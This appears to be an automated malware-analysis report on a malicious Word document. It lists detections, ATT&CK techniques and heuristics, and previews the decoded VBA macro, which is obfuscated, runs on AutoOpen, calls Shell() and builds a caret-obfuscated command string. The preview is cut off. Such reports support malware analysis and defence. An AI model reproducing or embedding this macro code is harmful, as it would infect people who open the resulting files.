MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and the 'Shell()' function is called, indicating an attempt to execute arbitrary code. The macro is likely responsible for downloading and executing a second-stage payload, though the exact mechanism is truncated.
Heuristics 6
-
ClamAV: Doc.Malware.00536d-6697203-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6697203-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 276331 bytes |
SHA-256: 70fbf46ee6a8f40c8ab42567e959c7fae2c7b01dd2d636de737ebab5d4d20994 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iULVCpNAj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim fQcYPM(2) fQcYPM(0) = Left(FWFCaa + qOtpTfkIDPztaVohIDbiY + aKHSVtDE, 297) + MidB(sIzfT + zvafBUCRdqOkZFZBU + voKzkp, 294, 185) fQcYPM(1) = MidB(qVbJUuJ + TcaOBriHuGRQfbzDjimHA + KtbELQ, 203, 422) + Right(VaJGCifP + ZqzJiZKUjVajpjijpH + iiLLwi, 928) Dim VbDHI(2) VbDHI(0) = MidB(rMZMLVvG + qwhBRMsCOuDkBnHBnX + iPrci, 193, 583) + Left(GiYinHDl + GBzocXIioFYfmlaNii + uzFdE, 304) + Right(PvIzE + OEABvPuwlljVdYiqDqWuY + kpcWp, 773) + MidB(LIhjc + PHrTfKardPOdksKtfFFb + NLSPbwFv, 64, 518) VbDHI(1) = MidB(FMsJz + aatZSwFXPuKfvWSbKiJS + cHWzA, 422, 138) + Left(VXUlAQW + jIQkHjtCWfPQHTriZitnvw + wNHLoCml, 339) Dim znDGTl(2) znDGTl(0) = MidB(FPBUKZ + nnUUnkvjuLqMBWwruW + CLdUjw, 855, 947) + MidB(AwwwY + DHZZZtatzzNfLORIJMA + zZoLfXEw, 826, 488) znDGTl(1) = Right(CzcRXt + ujDIVnjiwFCHlcuvWvz + CPIOp, 828) + Mid(LCtNVj + nZiuUnHQcMczTBvGFiVp + mrFsO, 596, 470) + Left(iVRbo + sqNiKsBwAaaSjJki + XJzoX, 869) + MidB(dlHrwmi + zQwEuOEwrPlIrGUhQpm + VVOSi, 768, 507) Dim cDkTR(1) cDkTR(0) = MidB(spfhJzMT + zWzRUhsQRYqUOZQqTHUKd + dqZiRZ, 690, 55) + Right(TEIVr + COBVRQXvdcrVXHEC + zzGRhO, 560) Dim RzrMR(2) RzrMR(0) = MidB(IZfnPcP + iHzHNcvZEXqWpMEdzGowAJk + QXMqLj, 84, 609) + MidB(GoDRfN + lkTjOolppLwzcTJrhiq + oihpvpJ, 675, 139) + Left(ZBjIYEZr + SYdUcIVMIvwmHvqAfcr + tZcBTcE, 979) + Mid(WGDUS + NuODaPlYIjqjraaDfUBkDw + YdDaXT, 837, 281) RzrMR(1) = Left(aTJqc + VImVvIuOBTMGzpMu + LXrcimZ, 146) + Mid(rzQioqEd + jJRXClzUUdiolJsQVimUMc + dSHljZOB, 51, 101) + MidB(smFlZLI + YCvLNzVoFupsWBOJakGjaRY + AuBTCO, 98, 296) + MidB(WZtGNz + AQDXrQzuRWVuoQuDbmdRmD + jjdsjA, 616, 463) Dim OkRzz(1) OkRzz(0) = Right(sqDBVtUt + qRwMENriYAmPfRtGoUIqn + iamcAUSI, 956) + MidB(vJXdGPEu + YktPbmLhbJoFFGYfTG + jjjjL, 278, 880) swiCqfBjh (KeyString(owTuRWl + BhYvR + 10 + 8 + 3 + 12 + 34 + MBBjjKf + fWNJjX) + wUfMuOI + HskKjtf + KeyString(uGLwdS + mzXATdH + 11 + 10 + 4 + 14 + 38 + zBOSmsiA + pGvcinP) + mcbUhiLkzvp + UlXEPWHM + LFLGvVI + BMQfhJoT + LLAzPC + ToRwRGcqdN + Dkrzimi + bHUYprjjC + jUKWa + qAEBiwdG + AFsiUGmEVQ + wpQjilZVz + hiVHPYFCp + uDuiGKqp + GzoujqsArY + HbXwTL + vujzlulQMhH + icNww + YKqsNZ + DQhiG) Dim fVMDLu(1) fVMDLu(0) = MidB(cVjUunz + LMEZwlXUJBofdTOzriCbrW + znXIO, 330, 956) + Right(nWjkpj + MrwsMGiAbMIkMaahI + XijuatzP, 39) + MidB(rffqTk + zOplooaTJOBWkZLSfkLl + kthXVH, 809, 6) + Right(YhwsG + cFntBGFcHSBIQUDutww + BHjAmR, 370) Dim GjnPEL(1) GjnPEL(0) = MidB(psEMdfH + dzsGPZvlRjmiMWPP + svNYjAz, 194, 852) + Left(wCKYQ + KbTTuNuAazHQsfpihfYL + ziomzFwi, 462) + Mid(KZBzdi + KlBJSNWlGLmPujFOhUD + oOfLAiDw, 114, 730) + Mid(zUWZZ + cMSBbGQYUkFGMDiOWGC + dHSwOjo, 151, 723) Dim PAIjPm(2) PAIjPm(0) = Right(bKfrDAqn + WjTWMtzNCRbBcfNkFifEUP + iiFNdsS, 686) + Right(soPhRY + zICMMECjmrcwHQTHpo + tGQCZVY, 243) PAIjPm(1) = MidB(wPZiWRA + IfsvblJQwQckJFvBDh + kqBsEh, 895, 26) + Left(NbDAL + QRHOqJzAVQVtzGIFZs + WzJXWo, 420) End Sub Attribute VB_Name = "KijmWjmbLtz" Function mcbUhiLkzvp() KipaNFsin = "d " + CStr(Chr(2 + 8 + 2 + 6 + 29)) + "V" + ":" + CStr(Chr(2 + 8 + 2 + 6 + 29)) + "C" + CStr(Chr(1 + 5 + 1 + 4 + 23)) + "s" + "^" + "e^" + "t " + ";" + "^$" + "=" HQTnNGA = "^3" + "0" + "1^" + " ^" + "30" + "9" + "^" + " " + "^" + "0^" + "5" + "1" ASDTnDDVH = "^ " + "5" + "^1" + "9" + " " + "^5" + "91" + "^ " + "^1" Dim ifVPwB(2) ifVPwB(0) = MidB(OsoIn + oiaYtlBZEcwzjpkcA + sNWjS, 651, 544) + Right(SwCJc + FjwdvKqSGPJzdifpN + tDZdz, 195) ifVPwB(1) = Right(nWjUftD + itfNMSwhISTiStqtDSL + kTsZisR, 504) + Right(HUWwhk + RBwPJjzlCKvuEdsatRo + jMfRvuJJ, 943) + Left(HiUJIbcG + oWlkSVJNOdLEfwHrtAwIc + IiSRph, 535) + MidB(puhdYUzj + wapNEwPVPpOIMFrwZwjc + JwiSZ, 25, 285) Dim RqMtn(1) RqMtn(0) = Right(YJkBqtNf + XuSuzjXOOdWVmDUwOzUc + HZEbPR, 910) + Left(FwdaTHpD + VBnwwWiAZnDSYVpOwziGi + rltpZ, 909) D ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.